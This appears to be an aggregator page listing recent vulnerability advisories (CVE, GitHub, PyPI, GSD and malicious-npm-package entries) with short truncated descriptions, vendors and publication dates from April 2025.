Recent vulnerabilities

Vulnerabilities are sorted by update time (recent to old).
ID	CVSS	Description	Vendor	Product	Published	Updated
cve-2025-37893	N/A	LoongArch: BPF: Fix off-by-one error in build_prologue()	Linux	Linux	2025-04-18T07:01:28.856Z	2025-04-25T10:06:50.345Z
cve-2025-37838	N/A	HSI: ssi_protocol: Fix use after free vulnerability in…	Linux	Linux	2025-04-18T14:20:55.389Z	2025-04-25T10:06:49.264Z
cve-2025-22126	N/A	md: fix mddev uaf while iterating all_mddevs list	Linux	Linux	2025-04-16T14:13:09.399Z	2025-04-25T10:06:48.152Z
cve-2025-22077	N/A	Revert "smb: client: fix TCP timers deadlock after rmmod"	Linux	Linux	2025-04-16T14:12:27.882Z	2025-04-25T10:06:47.046Z
cve-2025-22013	N/A	KVM: arm64: Unconditionally save+flush host FPSIMD/SVE…	Linux	Linux	2025-04-08T08:18:04.000Z	2025-04-25T10:06:45.938Z
cve-2025-21853	N/A	bpf: avoid holding freeze_mutex during mmap operation	Linux	Linux	2025-03-12T09:42:07.871Z	2025-04-25T10:06:44.826Z
cve-2024-53203	N/A	usb: typec: fix potential array underflow in ucsi_ccg_…	Linux	Linux	2024-12-27T13:49:49.484Z	2025-04-25T10:06:43.742Z
cve-2024-50063	N/A	bpf: Prevent tail call between progs attached to diffe…	Linux	Linux	2024-10-21T19:39:51.718Z	2025-04-25T10:06:42.681Z
cve-2024-49569	N/A	nvme-rdma: unquiesce admin_q before destroy it	Linux	Linux	2025-01-11T12:25:19.455Z	2025-04-25T10:06:41.619Z
cve-2024-46816	N/A	drm/amd/display: Stop amdgpu_dm initialize when link n…	Linux	Linux	2024-09-27T12:35:57.742Z	2025-04-25T10:06:40.529Z
cve-2024-46774	N/A	powerpc/rtas: Prevent Spectre v1 gadget construction i…	Linux	Linux	2024-09-18T07:12:31.782Z	2025-04-25T10:06:39.437Z
cve-2024-46742	N/A	smb/server: fix potential null-ptr-deref of lease_ctx_…	Linux	Linux	2024-09-18T07:12:03.251Z	2025-04-25T10:06:38.414Z
cve-2024-46733	N/A	btrfs: fix qgroup reserve leaks in cow_file_range	Linux	Linux	2024-09-18T06:32:27.453Z	2025-04-25T10:06:37.265Z
cve-2024-36908	N/A	blk-iocost: do not WARN if iocg was already offlined	Linux	Linux	2024-05-30T15:29:07.773Z	2025-04-25T10:06:36.111Z
cve-2025-1565		Mayosis Core <= 5.4.1 - Unauthenticated Arbitrary File Read	TeconceTheme	Mayosis Core	2025-04-25T09:21:41.127Z	2025-04-25T09:21:41.127Z
cve-2025-3870		1 Decembrie 1918 <= 1.dec.2012 - Cross-Site Request Fo…	olarmarius	1 Decembrie 1918	2025-04-25T08:22:13.223Z	2025-04-25T08:22:13.223Z
cve-2025-1279		BM Content Builder <= 3.16.2.1 - Missing Authorization…	SeaTheme	BM Content Builder	2025-04-25T08:22:13.773Z	2025-04-25T08:22:13.773Z
cve-2025-46535	5.4 (v3.1)	WordPress Custom Login and Registration plugin <= 1.0.…	AlphaEfficiencyTeam	Custom Login and Registration	2025-04-25T08:05:56.925Z	2025-04-25T08:05:56.925Z
cve-2025-46482	6.5 (v3.1)	WordPress WP Quiz plugin <= 2.0.10 - Cross Site Script…	MyThemeShop	WP Quiz	2025-04-25T07:52:09.343Z	2025-04-25T07:52:09.343Z
cve-2025-3743		Upsell Funnel Builder for WooCommerce <= 3.0.0 - Unaut…	wpswings	Upsell Funnel Builder for WooCommerce	2025-04-25T06:45:29.320Z	2025-04-25T06:45:29.320Z
cve-2025-3868		Custom Admin-Bar Favorites <= 0.1 - Reflected Cross-Si…	codeandreload	Custom Admin-Bar Favorites	2025-04-25T06:45:28.347Z	2025-04-25T06:45:28.347Z
cve-2025-2238		Vikinger <= 1.9.30 - Authenticated (Subscriber+) Privi…	Odin_Design	Vikinger	2025-04-25T06:45:28.836Z	2025-04-25T06:45:28.836Z
cve-2025-3867		Ajax Comment Form CST <= 1.2 - Cross-Site Request Forg…	rafe007	Ajax Comment Form CST	2025-04-25T06:45:27.801Z	2025-04-25T06:45:27.801Z
cve-2025-3866		Add Google +1 (Plus one) social share Button <= 1.0.0 …	rohanpawale	Add Google +1 (Plus one) social share Button	2025-04-25T06:45:27.032Z	2025-04-25T06:45:27.032Z
cve-2025-46616		Quantum StorNext Web GUI API before 7.2.4 allows …	Quantum	StorNext	2025-04-25T00:00:00.000Z	2025-04-25T06:36:30.847Z
cve-2025-46617		Quantum StorNext Web GUI API before 7.2.4 grants …	Quantum	StorNext	2025-04-25T00:00:00.000Z	2025-04-25T06:34:12.559Z
cve-2025-0671	N/A	Email Subscribers < 5.7.50 - Admin+ Stored XSS in Template	Unknown	Icegram Express	2025-04-25T06:00:09.903Z	2025-04-25T06:00:09.903Z
cve-2025-46613		OpenPLC 3 through 64f9c11 has server.cpp Memory C…	openplcproject	OpenPLC	2025-04-25T00:00:00.000Z	2025-04-25T05:42:40.696Z
cve-2025-3923		Prevent Direct Access – Protect WordPress Files <= 2.8…	buildwps	Prevent Direct Access – Protect WordPress Files	2025-04-25T05:25:07.625Z	2025-04-25T05:25:07.625Z
cve-2025-3861		Prevent Direct Access 2.8.6 - 2.8.8.2 - Incorrect Auth…	buildwps	Prevent Direct Access – Protect WordPress Files	2025-04-25T05:25:07.164Z	2025-04-25T05:25:07.164Z

Vulnerabilities are sorted by update time (recent to old).
ID	CVSS	Description	Vendor	Product	Published	Updated
cve-2025-1565		Mayosis Core <= 5.4.1 - Unauthenticated Arbitrary File Read	TeconceTheme	Mayosis Core	2025-04-25T09:21:41.127Z	2025-04-25T09:21:41.127Z
cve-2025-3870		1 Decembrie 1918 <= 1.dec.2012 - Cross-Site Request Fo…	olarmarius	1 Decembrie 1918	2025-04-25T08:22:13.223Z	2025-04-25T08:22:13.223Z
cve-2025-1279		BM Content Builder <= 3.16.2.1 - Missing Authorization…	SeaTheme	BM Content Builder	2025-04-25T08:22:13.773Z	2025-04-25T08:22:13.773Z
cve-2025-46535	5.4 (v3.1)	WordPress Custom Login and Registration plugin <= 1.0.…	AlphaEfficiencyTeam	Custom Login and Registration	2025-04-25T08:05:56.925Z	2025-04-25T08:05:56.925Z
cve-2025-46482	6.5 (v3.1)	WordPress WP Quiz plugin <= 2.0.10 - Cross Site Script…	MyThemeShop	WP Quiz	2025-04-25T07:52:09.343Z	2025-04-25T07:52:09.343Z
cve-2025-46617		Quantum StorNext Web GUI API before 7.2.4 grants …	Quantum	StorNext	2025-04-25T00:00:00.000Z	2025-04-25T06:34:12.559Z
cve-2025-46616		Quantum StorNext Web GUI API before 7.2.4 allows …	Quantum	StorNext	2025-04-25T00:00:00.000Z	2025-04-25T06:36:30.847Z
cve-2025-3868		Custom Admin-Bar Favorites <= 0.1 - Reflected Cross-Si…	codeandreload	Custom Admin-Bar Favorites	2025-04-25T06:45:28.347Z	2025-04-25T06:45:28.347Z
cve-2025-3867		Ajax Comment Form CST <= 1.2 - Cross-Site Request Forg…	rafe007	Ajax Comment Form CST	2025-04-25T06:45:27.801Z	2025-04-25T06:45:27.801Z
cve-2025-3866		Add Google +1 (Plus one) social share Button <= 1.0.0 …	rohanpawale	Add Google +1 (Plus one) social share Button	2025-04-25T06:45:27.032Z	2025-04-25T06:45:27.032Z
cve-2025-3743		Upsell Funnel Builder for WooCommerce <= 3.0.0 - Unaut…	wpswings	Upsell Funnel Builder for WooCommerce	2025-04-25T06:45:29.320Z	2025-04-25T06:45:29.320Z
cve-2025-2238		Vikinger <= 1.9.30 - Authenticated (Subscriber+) Privi…	Odin_Design	Vikinger	2025-04-25T06:45:28.836Z	2025-04-25T06:45:28.836Z
cve-2025-46613		OpenPLC 3 through 64f9c11 has server.cpp Memory C…	openplcproject	OpenPLC	2025-04-25T00:00:00.000Z	2025-04-25T05:42:40.696Z
cve-2025-3923		Prevent Direct Access – Protect WordPress Files <= 2.8…	buildwps	Prevent Direct Access – Protect WordPress Files	2025-04-25T05:25:07.625Z	2025-04-25T05:25:07.625Z
cve-2025-3861		Prevent Direct Access 2.8.6 - 2.8.8.2 - Incorrect Auth…	buildwps	Prevent Direct Access – Protect WordPress Files	2025-04-25T05:25:07.164Z	2025-04-25T05:25:07.164Z
cve-2025-3511	5.9 (v3.1)	Improper Validation of Specified Quantity in Inpu…	Mitsubishi Electric Corporation	CC-Link IE TSN Remote I/O module NZ2GN2S1-32D	2025-04-25T05:14:43.758Z	2025-04-25T05:14:43.758Z
cve-2025-2580		Contact Form by Bit Form <= 2.18.3 - Authenticated (Au…	bitpressadmin	Contact Form by Bit Form: Multi Step Form, Calculation Contact Form, Payment Contact Form & Custom Contact Form builder	2025-04-25T05:25:06.373Z	2025-04-25T05:25:06.373Z
cve-2025-0671	N/A	Email Subscribers < 5.7.50 - Admin+ Stored XSS in Template	Unknown	Icegram Express	2025-04-25T06:00:09.903Z	2025-04-25T06:00:09.903Z
cve-2025-46599		CNCF K3s 1.32 before 1.32.4-rc1+k3s1 has a Kubern…	K3s	K3s	2025-04-25T00:00:00.000Z	2025-04-25T04:27:34.356Z
cve-2025-3775		ShopLentor – WooCommerce Builder for Elementor & Guten…	devitemsllc	ShopLentor – WooCommerce Builder for Elementor & Gutenberg +20 Modules – All in One Solution (formerly WooLentor)	2025-04-25T04:23:04.940Z	2025-04-25T04:23:04.940Z
cve-2025-3752		Able Player, accessible HTML5 media player <= 1.2.1 - …	terrillthompson	Able Player, accessible HTML5 media player	2025-04-25T04:23:05.578Z	2025-04-25T04:23:05.578Z
cve-2025-46595		An XSS issue was discovered in the Flag module be…	backdropcms	Flag	2025-04-25T00:00:00.000Z	2025-04-25T03:05:31.211Z
cve-2025-46547		In Sherpa Orchestrator 141851, the web applicatio…	Sherpa	Orchestrator	2025-04-25T00:00:00.000Z	2025-04-25T02:19:20.517Z
cve-2025-46546		In Sherpa Orchestrator 141851, multiple time-base…	Sherpa	Orchestrator	2025-04-25T00:00:00.000Z	2025-04-25T02:38:27.087Z
cve-2025-46545		In Sherpa Orchestrator 141851, the functionality …	Sherpa	Orchestrator	2025-04-25T00:00:00.000Z	2025-04-25T02:24:23.784Z
cve-2025-46544		In Sherpa Orchestrator 141851, a low-privileged u…	Sherpa	Orchestrator	2025-04-25T00:00:00.000Z	2025-04-25T02:29:34.996Z
cve-2025-3900	N/A	Colorbox - Moderately critical - Cross Site Scripting …	Drupal	Colorbox	2025-04-23T17:07:37.137Z	2025-04-25T02:49:38.915Z
cve-2025-3512	4.8 (v4.0)	Buffer overflow in QTextMarkdownImporter	The Qt Company	Qt	2025-04-11T07:39:48.298Z	2025-04-25T01:30:39.477Z
cve-2025-0395	N/A	When the assert() function in the GNU C Library v…	The GNU C Library	glibc	2025-01-22T13:11:30.406Z	2025-04-25T01:30:38.375Z
cve-2025-43865		React Router allows pre-render data spoofing on React-…	remix-run	react-router	2025-04-25T00:18:53.222Z	2025-04-25T00:18:53.222Z

Vulnerabilities are sorted by update time (recent to old).
ID	Description	Published	Updated
fkie_cve-2025-3870	The 1 Decembrie 1918 plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versio…	2025-04-25T09:15:14.573	2025-04-25T09:15:14.573
fkie_cve-2025-1279	The BM Content Builder plugin for WordPress is vulnerable to unauthorized modification of data that…	2025-04-25T09:15:14.063	2025-04-25T09:15:14.063
fkie_cve-2025-46535	Missing Authorization vulnerability in AlphaEfficiencyTeam Custom Login and Registration allows Exp…	2025-04-25T08:15:13.483	2025-04-25T08:15:13.483
fkie_cve-2025-46482	Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability …	2025-04-25T08:15:13.320	2025-04-25T08:15:13.320
fkie_cve-2025-46617	Quantum StorNext Web GUI API before 7.2.4 grants access to internal StorNext configuration and unau…	2025-04-25T07:15:48.837	2025-04-25T07:15:48.837
fkie_cve-2025-46616	Quantum StorNext Web GUI API before 7.2.4 allows potential Arbitrary Remote Code Execution (RCE) vi…	2025-04-25T07:15:48.643	2025-04-25T07:15:48.643
fkie_cve-2025-3868	The Custom Admin-Bar Favorites plugin for WordPress is vulnerable to Reflected Cross-Site Scripting…	2025-04-25T07:15:48.473	2025-04-25T07:15:48.473
fkie_cve-2025-3867	The Ajax Comment Form CST plugin for WordPress is vulnerable to Cross-Site Request Forgery in all v…	2025-04-25T07:15:48.320	2025-04-25T07:15:48.320
fkie_cve-2025-3866	The Add Google +1 (Plus one) social share Button plugin for WordPress is vulnerable to Cross-Site R…	2025-04-25T07:15:48.143	2025-04-25T07:15:48.143
fkie_cve-2025-3743	The Upsell Funnel Builder for WooCommerce plugin for WordPress is vulnerable to order manipulation …	2025-04-25T07:15:47.980	2025-04-25T07:15:47.980
fkie_cve-2025-2238	The Vikinger theme for WordPress is vulnerable to privilege in all versions up to, and including, 1…	2025-04-25T07:15:47.523	2025-04-25T07:15:47.523
fkie_cve-2025-46613	OpenPLC 3 through 64f9c11 has server.cpp Memory Corruption because a thread may access handleConnec…	2025-04-25T06:15:46.273	2025-04-25T06:15:46.273
fkie_cve-2025-3923	The Prevent Direct Access – Protect WordPress Files plugin for WordPress is vulnerable to Sensitive…	2025-04-25T06:15:46.117	2025-04-25T06:15:46.117
fkie_cve-2025-3861	The Prevent Direct Access – Protect WordPress Files plugin for WordPress is vulnerable to unauthori…	2025-04-25T06:15:45.957	2025-04-25T06:15:45.957
fkie_cve-2025-3511	Improper Validation of Specified Quantity in Input vulnerability in Mitsubishi Electric Corporation…	2025-04-25T06:15:45.753	2025-04-25T06:15:45.753
fkie_cve-2025-2580	The Contact Form by Bit Form plugin for WordPress is vulnerable to Stored Cross-Site Scripting via …	2025-04-25T06:15:45.457	2025-04-25T06:15:45.457
fkie_cve-2025-0671	The Icegram Express WordPress plugin before 5.7.50 does not sanitise and escape some of its Templa…	2025-04-25T06:15:44.237	2025-04-25T06:15:44.237
fkie_cve-2025-46599	CNCF K3s 1.32 before 1.32.4-rc1+k3s1 has a Kubernetes kubelet configuration change with the uninten…	2025-04-25T05:15:33.330	2025-04-25T05:15:33.330
fkie_cve-2025-3775	The ShopLentor – WooCommerce Builder for Elementor & Gutenberg +20 Modules – All in One Solution (f…	2025-04-25T05:15:33.153	2025-04-25T05:15:33.153
fkie_cve-2025-3752	The Able Player, accessible HTML5 media player plugin for WordPress is vulnerable to Stored Cross-S…	2025-04-25T05:15:32.830	2025-04-25T05:15:32.830
fkie_cve-2025-46595	An XSS issue was discovered in the Flag module before 1.x-3.6.2 for Backdrop CMS. Flag is a module …	2025-04-25T03:15:20.583	2025-04-25T03:15:20.583
fkie_cve-2025-46547	In Sherpa Orchestrator 141851, the web application lacks protection against CSRF attacks, with resu…	2025-04-25T03:15:20.430	2025-04-25T03:15:20.430
fkie_cve-2025-46546	In Sherpa Orchestrator 141851, multiple time-based blind SQL injections can be performed by an auth…	2025-04-25T03:15:20.270	2025-04-25T03:15:20.270
fkie_cve-2025-46545	In Sherpa Orchestrator 141851, the functionality for adding or updating licenses allows for stored …	2025-04-25T03:15:20.110	2025-04-25T03:15:20.110
fkie_cve-2025-46544	In Sherpa Orchestrator 141851, a low-privileged user can elevate their privileges by creating new u…	2025-04-25T03:15:19.953	2025-04-25T03:15:19.953
fkie_cve-2025-3900	Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability …	2025-04-23T17:16:55.760	2025-04-25T03:15:19.000
fkie_cve-2025-3512	There is a Heap-based Buffer Overflow vulnerability in QTextMarkdownImporter. This requires an inco…	2025-04-11T08:15:15.797	2025-04-25T02:15:14.603
fkie_cve-2025-0395	When the assert() function in the GNU C Library versions 2.13 to 2.40 fails, it does not allocate e…	2025-01-22T13:15:20.933	2025-04-25T02:15:13.740
fkie_cve-2025-43865	React Router is a router for React. In versions on the 7.0 branch prior to version 7.5.2, it's poss…	2025-04-25T01:15:43.270	2025-04-25T01:15:43.270
fkie_cve-2025-43864	React Router is a router for React. Starting in version 7.2.0 and prior to version 7.5.2, it is pos…	2025-04-25T01:15:43.117	2025-04-25T01:15:43.117

Vulnerabilities are sorted by update time (recent to old).
ID	Description	Published	Updated
ghsa-v22r-2c57-5frw	Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability …	2025-04-25T09:31:49Z	2025-04-25T09:31:49Z
ghsa-p2h6-wjr5-7mx4	Quantum StorNext Web GUI API before 7.2.4 allows potential Arbitrary Remote Code Execution (RCE) vi…	2025-04-25T09:31:49Z	2025-04-25T09:31:49Z
ghsa-fhwh-5w3x-c8g5	The Ajax Comment Form CST plugin for WordPress is vulnerable to Cross-Site Request Forgery in all v…	2025-04-25T09:31:48Z	2025-04-25T09:31:49Z
ghsa-c4p7-3xph-5f74	The 1 Decembrie 1918 plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versio…	2025-04-25T09:31:49Z	2025-04-25T09:31:49Z
ghsa-8p8h-vpmc-q8xq	Quantum StorNext Web GUI API before 7.2.4 grants access to internal StorNext configuration and unau…	2025-04-25T09:31:49Z	2025-04-25T09:31:49Z
ghsa-3gqj-8wmx-4j7x	The BM Content Builder plugin for WordPress is vulnerable to unauthorized modification of data that…	2025-04-25T09:31:49Z	2025-04-25T09:31:49Z
ghsa-2vhv-mf9g-gm93	Missing Authorization vulnerability in AlphaEfficiencyTeam Custom Login and Registration allows Exp…	2025-04-25T09:31:49Z	2025-04-25T09:31:49Z
ghsa-mrfc-r624-5cgr	The Vikinger theme for WordPress is vulnerable to privilege in all versions up to, and including, 1…	2025-04-25T09:31:48Z	2025-04-25T09:31:48Z
ghsa-mghj-58qq-48h7	The Custom Admin-Bar Favorites plugin for WordPress is vulnerable to Reflected Cross-Site Scripting…	2025-04-25T09:31:48Z	2025-04-25T09:31:48Z
ghsa-4vcr-xh7r-34v9	The Add Google +1 (Plus one) social share Button plugin for WordPress is vulnerable to Cross-Site R…	2025-04-25T09:31:48Z	2025-04-25T09:31:48Z
ghsa-3hwm-4538-x9g2	The Upsell Funnel Builder for WooCommerce plugin for WordPress is vulnerable to order manipulation …	2025-04-25T09:31:48Z	2025-04-25T09:31:48Z
ghsa-j3q9-8jfc-977f	The ShopLentor – WooCommerce Builder for Elementor & Gutenberg +20 Modules – All in One Solution (f…	2025-04-25T06:30:56Z	2025-04-25T06:30:56Z
ghsa-f46p-qr4h-m6p4	Improper Validation of Specified Quantity in Input vulnerability in Mitsubishi Electric Corporation…	2025-04-25T06:30:56Z	2025-04-25T06:30:56Z
ghsa-864f-7xjm-2jp2	CNCF K3s 1.32 before 1.32.4-rc1+k3s1 has a Kubernetes kubelet configuration change with the uninten…	2025-04-25T06:30:56Z	2025-04-25T06:30:56Z
ghsa-8474-6c4p-g4qc	The Able Player, accessible HTML5 media player plugin for WordPress is vulnerable to Stored Cross-S…	2025-04-25T06:30:56Z	2025-04-25T06:30:56Z
ghsa-7grj-j85v-9cc6	The Contact Form by Bit Form plugin for WordPress is vulnerable to Stored Cross-Site Scripting via …	2025-04-25T06:30:56Z	2025-04-25T06:30:56Z
ghsa-5vjg-4vv4-p3vj	OpenPLC 3 through 64f9c11 has server.cpp Memory Corruption because a thread may access handleConnec…	2025-04-25T06:30:56Z	2025-04-25T06:30:56Z
ghsa-4c3f-c9v6-jqxm	The Icegram Express WordPress plugin before 5.7.50 does not sanitise and escape some of its Templa…	2025-04-25T06:30:56Z	2025-04-25T06:30:56Z
ghsa-3jr3-8hm5-hxqw	The Prevent Direct Access – Protect WordPress Files plugin for WordPress is vulnerable to Sensitive…	2025-04-25T06:30:56Z	2025-04-25T06:30:56Z
ghsa-2cf2-4mqr-v9rj	The Prevent Direct Access – Protect WordPress Files plugin for WordPress is vulnerable to unauthori…	2025-04-25T06:30:56Z	2025-04-25T06:30:56Z
ghsa-qgfc-q68c-8fgx	An XSS issue was discovered in the Flag module before 1.x-3.6.2 for Backdrop CMS. Flag is a module …	2025-04-25T03:30:34Z	2025-04-25T03:30:34Z
ghsa-mmfm-hc46-3944	In Sherpa Orchestrator 141851, multiple time-based blind SQL injections can be performed by an auth…	2025-04-25T03:30:34Z	2025-04-25T03:30:34Z
ghsa-g2vc-w9mc-h6ch	In Sherpa Orchestrator 141851, the web application lacks protection against CSRF attacks, with resu…	2025-04-25T03:30:34Z	2025-04-25T03:30:34Z
ghsa-6f6h-2hc4-8gjc	In Sherpa Orchestrator 141851, a low-privileged user can elevate their privileges by creating new u…	2025-04-25T03:30:34Z	2025-04-25T03:30:34Z
ghsa-37m8-vrcv-2x3f	In Sherpa Orchestrator 141851, the functionality for adding or updating licenses allows for stored …	2025-04-25T03:30:34Z	2025-04-25T03:30:34Z
ghsa-fvp7-w3vq-22p7	Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability …	2025-04-23T18:31:00Z	2025-04-25T03:30:33Z
ghsa-794f-v4rm-x7r5	There is a Heap-based Buffer Overflow vulnerability in QTextMarkdownImporter. This requires an inco…	2025-04-11T09:30:24Z	2025-04-25T03:30:33Z
ghsa-4xpw-6594-8f5m	When the assert() function in the GNU C Library versions 2.13 to 2.40 fails, it does not allocate e…	2025-01-22T15:32:34Z	2025-04-25T03:30:33Z
ghsa-m6cm-6rg5-wfc9	The eForm - WordPress Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scriptin…	2025-04-25T00:32:02Z	2025-04-25T00:32:02Z
ghsa-grw8-qwrc-c9v2	UNI-NMS-Lite is vulnerable to a command injection attack that could allow an unauthenticated attac…	2025-04-25T00:32:02Z	2025-04-25T00:32:02Z

Vulnerabilities are sorted by update time (recent to old).
ID	Description	Package	Published	Updated
pysec-2025-34	The unsafe globals in Picklescan before 0.0.25 do not include ssl. Consequently, ssl.get_…	picklescan	2025-04-24T01:15:49+00:00	2025-04-24T03:08:15.436691+00:00
pysec-2025-33	Vyper is a Pythonic Smart Contract Language for the EVM. When the Vyper Compiler uses the…	vyper	2025-01-14T18:16:05+00:00	2025-04-23T21:23:01.322686+00:00
pysec-2025-32	BentoML is a Python library for building online serving systems optimized for AI apps and…	bentoml	2025-04-09T16:15:25+00:00	2025-04-22T19:21:34.073355+00:00
pysec-2024-111	A path traversal vulnerability exists in the `getFullPath` method of langchain-ai/langcha…	langchain	2024-10-29T13:15:00Z	2025-04-22T15:35:43.008056Z
pysec-2024-85	Deserialization of untrusted data can occur in versions 23.10.2.0 and newer of the MindsD…	mindsdb	2024-09-12T13:15:00Z	2025-04-22T12:06:12.475438Z
pysec-2024-84	Deserialization of untrusted data can occur in versions 23.10.3.0 and newer of the MindsD…	mindsdb	2024-09-12T13:15:00Z	2025-04-22T12:06:12.414777Z
pysec-2024-83	Deserialization of untrusted data can occur in versions 23.10.2.0 and newer of the MindsD…	mindsdb	2024-09-12T13:15:00Z	2025-04-22T12:06:12.353136Z
pysec-2024-82	Deserialization of untrusted data can occur in versions 23.3.2.0 and newer of the MindsDB…	mindsdb	2024-09-12T13:15:00Z	2025-04-22T12:06:12.290254Z
pysec-2023-278	MindsDB connects artificial intelligence models to real time data. Versions prior to 23.1…	mindsdb	2023-12-11T21:15:00Z	2025-04-22T12:06:12.211082Z
pysec-2025-31	vyper is a Pythonic Smart Contract Language for the EVM. Vyper handles AugAssign statemen…	vyper	2025-02-21T22:15:13+00:00	2025-04-09T17:27:28.116292+00:00
pysec-2025-30	vyper is a Pythonic Smart Contract Language for the EVM. Multiple evaluation of a single …	vyper	2025-02-21T22:15:13+00:00	2025-04-09T17:27:28.064106+00:00
pysec-2025-29	vyper is a Pythonic Smart Contract Language for the EVM. Vyper `sqrt()` builtin uses the …	vyper	2025-02-21T22:15:13+00:00	2025-04-09T17:27:28.005382+00:00
pysec-2025-28	The Snowflake Connector for Python provides an interface for developing Python applicatio…	snowflake-connector-python	2025-01-29T21:15:21+00:00	2025-04-09T17:27:27.772920+00:00
pysec-2025-27	The Snowflake Connector for Python provides an interface for developing Python applicatio…	snowflake-connector-python	2025-01-29T21:15:21+00:00	2025-04-09T17:27:27.711157+00:00
pysec-2025-26	The Snowflake Connector for Python provides an interface for developing Python applicatio…	snowflake-connector-python	2025-01-29T21:15:21+00:00	2025-04-09T17:27:27.645758+00:00
pysec-2021-891	CWE - CWE-287: Improper Authentication vulnerability in SUSE Linux Enterprise Server 15 S…	salt	2021-03-03T10:15:13+00:00	2025-04-09T17:27:27.582884+00:00
pysec-2025-25	Rembg is a tool to remove images background. In Rembg 2.0.57 and earlier, the CORS middle…	rembg	2025-03-03T17:15:14+00:00	2025-04-09T17:27:27.532849+00:00
pysec-2025-24	Rembg is a tool to remove images background. In Rembg 2.0.57 and earlier, the /api/remove…	rembg	2025-03-03T17:15:14+00:00	2025-04-09T17:27:27.486485+00:00
pysec-2025-23	Versions of the package ray before 2.43.0 are vulnerable to Insertion of Sensitive Inform…	ray	2025-03-06T05:15:16+00:00	2025-04-09T17:27:27.434099+00:00
pysec-2022-43179	Poetry is a dependency manager for Python. To handle dependencies that come from a Git re…	poetry	2022-09-07T19:15:08+00:00	2025-04-09T17:27:27.255151+00:00
pysec-2025-22	A vulnerability, that could result in Remote Code Execution (RCE), has been found in Plot…	plotai	2025-03-10T14:15:24+00:00	2025-04-09T17:27:27.203714+00:00
pysec-2023-311	plone.namedfile allows users to handle `File` and `Image` fields targeting, but not depen…	plone-namedfile	2023-09-21T15:15:10+00:00	2025-04-09T17:27:27.153848+00:00
pysec-2025-21	picklescan before 0.0.23 fails to detect malicious pickle files inside PyTorch model arch…	picklescan	2025-03-10T12:15:12+00:00	2025-04-09T17:27:27.016747+00:00
pysec-2025-20	picklescan before 0.0.23 is vulnerable to a ZIP archive manipulation attack that causes i…	picklescan	2025-03-10T12:15:10+00:00	2025-04-09T17:27:26.966215+00:00
pysec-2025-19	picklescan before 0.0.22 only considers standard pickle file extensions in the scope for …	picklescan	2025-03-03T19:15:34+00:00	2025-04-09T17:27:26.916350+00:00
pysec-2025-18	picklescan before 0.0.21 does not treat 'pip' as an unsafe global. An attacker could craf…	picklescan	2025-02-26T15:15:24+00:00	2025-04-09T17:27:26.867210+00:00
pysec-2023-310	Mobile Security Framework (MobSF) <=v3.7.8 Beta is vulnerable to Insecure Permissions. NO…	mobsf	2023-09-21T22:15:11+00:00	2025-04-09T17:27:26.663665+00:00
pysec-2025-17	In mlflow/mlflow version 2.18, an admin is able to create a new user account without sett…	mlflow	2025-03-20T10:15:54+00:00	2025-04-09T17:27:26.322333+00:00
pysec-2023-309	Path Traversal in GitHub repository mlflow/mlflow prior to 2.9.2.	mlflow	2023-12-13T00:15:07+00:00	2025-04-09T17:27:26.271200+00:00
pysec-2023-308	Absolute Path Traversal in GitHub repository mlflow/mlflow prior to 2.5.0.	mlflow	2023-07-19T01:15:10+00:00	2025-04-09T17:27:26.223213+00:00

Vulnerabilities are sorted by update time (recent to old).
ID	Description
gsd-2024-33903	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33902	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33901	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33900	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33899	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33898	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33897	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33896	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33895	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33894	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33893	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33892	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33891	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33890	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33889	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33888	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33887	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33886	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33885	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33884	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33883	The format of the source doesn't require a description, click on the link for more details
gsd-2024-4303	The format of the source doesn't require a description, click on the link for more details
gsd-2024-4302	The format of the source doesn't require a description, click on the link for more details
gsd-2024-4301	The format of the source doesn't require a description, click on the link for more details
gsd-2024-4300	The format of the source doesn't require a description, click on the link for more details
gsd-2024-4299	The format of the source doesn't require a description, click on the link for more details
gsd-2024-4298	The format of the source doesn't require a description, click on the link for more details
gsd-2024-4297	The format of the source doesn't require a description, click on the link for more details
gsd-2024-4296	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33882	The format of the source doesn't require a description, click on the link for more details

Vulnerabilities are sorted by update time (recent to old).
ID	Description	Published	Updated
mal-2024-1280	Malicious code in @symplr-ux/alloy-icons (npm)	2024-04-22T08:14:41Z	2024-04-22T08:14:42Z
mal-2024-1291	Malicious code in shard-packages (npm)	2024-04-22T08:02:34Z	2024-04-22T08:02:40Z
mal-2024-1287	Malicious code in ecs-cdk (npm)	2024-04-22T08:02:34Z	2024-04-22T08:02:40Z
mal-2024-1295	Malicious code in teleport-app-example-node (npm)	2024-04-22T08:02:34Z	2024-04-22T08:02:35Z
mal-2024-1293	Malicious code in swift-docc-rendeeeeeer (npm)	2024-04-22T08:02:34Z	2024-04-22T08:02:35Z
mal-2024-1283	Malicious code in cuckoo-3-web-ui-tooling (npm)	2024-04-22T08:02:34Z	2024-04-22T08:02:35Z
mal-2024-1286	Malicious code in djs-status (npm)	2024-04-22T06:18:24Z	2024-04-22T06:18:29Z
mal-2024-1285	Malicious code in djs-embeds-v2 (npm)	2024-04-22T06:18:24Z	2024-04-22T06:18:29Z
mal-2024-1284	Malicious code in discord-caches (npm)	2024-04-22T06:18:24Z	2024-04-22T06:18:29Z
mal-2024-1296	Malicious code in waveapi (npm)	2024-04-22T06:18:23Z	2024-04-22T06:18:24Z
